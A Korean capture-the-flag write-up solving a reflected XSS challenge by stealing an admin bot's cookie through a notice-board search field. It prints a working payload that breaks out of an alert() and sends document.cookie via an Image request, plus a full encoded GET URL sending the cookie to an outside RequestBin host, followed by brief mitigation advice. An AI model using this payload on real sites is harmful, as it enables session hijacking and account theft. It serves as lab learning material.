[SegFault] (XSS) - XSS 2

[SegFault] (XSS)

XSS 2

관리자의 Cookie를 탈취하세요!

문제 파악

본 문제의 경우 XSS의 취약점을 찾고, 관리자 Bot에 해당 링크를 입력하여 공격자 서버로 Cookie 값을 탈취하여 받으면 Flag를 획득할 수 있는 방식으로 이루어져 있다.

하지만 현재 공격자 서버를 갖고 있지 않으므로 RequestBin을 이용하기로 한다.

우선 위의 [관리자 방문 Bot Link]에 접속하면 다음과 같은 URL 입력창을 볼 수 있다.

XSS 취약점을 발견하고 해당 링크를 위의 URL에 입력하면 공격자 서버(RequestBin)로 쿠키 값이 날아오는 방식이다.

이제 아래의 문제 링크에 접속하면 다음과 같은 창이 나온다.

우선 회원가입 후 로그인을 시도해본다.

마이페이지에는 XSS 취약점이 존재하지 않는다고 판단되어 공지사항을 살펴보기로 한다.

공지사항의 검색기능을 이용해본다.

그 결과 검색어가 그대로 알림창에 노출되는 것을 확인할 수 있었다.

검색어의 결과가 alert() 내부에 들어 있는 것을 확인할 수 있었고, 검색어에 특수기호에 대한 검색이 가능한지 확인해본다.

XSS Point

< ' " >

위의 특수기호에 대한 검색 결과 <, > 는 HTML Entity로 치환되지만 ' , " 의 경우 그대로 반사되어 출력되는 것을 확인하였다.

script 태그의 alert문 내부에 검색어가 입력되므로 이를 이용하여 확인해본다.

1');//

위와 같이 입력해주는 경우 다음과 같이 alert내부에는 '1' 만 남고, 나머지는 주석처리 되는 것을 확인할 수 있고, 이에 따라 알림창에 1만 뜨는 것을 확인할 수 있다.

위와 같이 검색어의 입력값을 조작하여 원하는 스크립트를 반사시킬 수 있다는 것을 확인하였으므로 페이로드(Payload)를 삽입하여 쿠키위 탈취를 시도한다.

---

풀이 과정 (해결 방안)

페이로드(Payload)

XSS검색어 노출');
var cookieData = document.cookie;
var i = new Image();
i.src = "https://공격자 주소/?cookie="+cookieData;
//

위와 같이 alert문을 '); 를 이용하여 닫아주고, alert문의 뒷부분을 //를 이용하여 주석처리를 하여 그 사이에 원하는 스크립트의 삽입기 가능하다.

검색어에 위와 같이 입력하는 경우 다음과 같이 삽입한 스크립트가 활성화되어 있는 것을 확인할 수 있다.

그런데 해당 검색 기능은 파라미터를 POST Method를 이용하여 보내주고 있음을 확인할 수 있다. 반사되는 입력값 노출을 다른 이용자에게 보내려면 URL로서 보내야 하는데 URL은 GET Method만 가능하다.

 

스크립트 전달(URL)

이를 Burp를 이용하여 POST Method를 GET Method로 변환해본 결과 동일한 결과를 얻을 수 있다는 것을 확인할 수 있었다.

이에 해당 요청의 URL을 copy하여 다음과 같이 생성된 것을 확인할 수 있다.

http://ctf.segfaulthub.com:4343/xss_2/notice_list.php?option_val=username&board_result=XSS+%EA%B2%80%EC%83%89%EC%96%B4+%EB%85%B8%EC%B6%9C%27%29%3B+var+cookieData+%3D+document.cookie%3B+var+i+%3D+new+Image%28%29%3B++i.src+%3D+%22https%3A%2F%2Fenvo7w0acv6g.x.pipedream.net%2F%3Fcookie%3D%22%2BcookieData%3B++%2F%2F&board_search=%F0%9F%94%8D&date_from=&date_to=

위의 URL을 클릭하도록 유도하여 XSS가 발생하도록 하는 것이 가능하다.

따라서 해당 URL을 관리자 Bot에 보내준다.

탈취된 쿠키(Cookie)가 공격자 주소(RequestBin)으로 받아와지는 것을 확인할 수 있다.

위와 같이 검색어를 입력하는 일련의 과정을 담은 URL로의 접속 유도를 통하여 원하는 flag가 획득된 것을 확인하였다.

---

취약점에 관한 고찰

본 문제의 경우 검색 기능의 입력값이 알림창을 통해 그대로 반사되어 노출되는 것을 이용한 Reflected XSS 취약점이다. 입력의 값이 응답(Response)에 그대로 반사되어 노출되는 경우 문제가 될 수 있기 때문에 검색 입력 값의 최대 길이를 제한하거나, 검색어를 직접적으로 노출 시키지 않고 '해당하는 검색어가 없습니다.' 와 같은 입력값을 제외한 메시지를 출력하도록 해야한다.

---

질문 환영, 수정 및 보완에 대한 지적 환영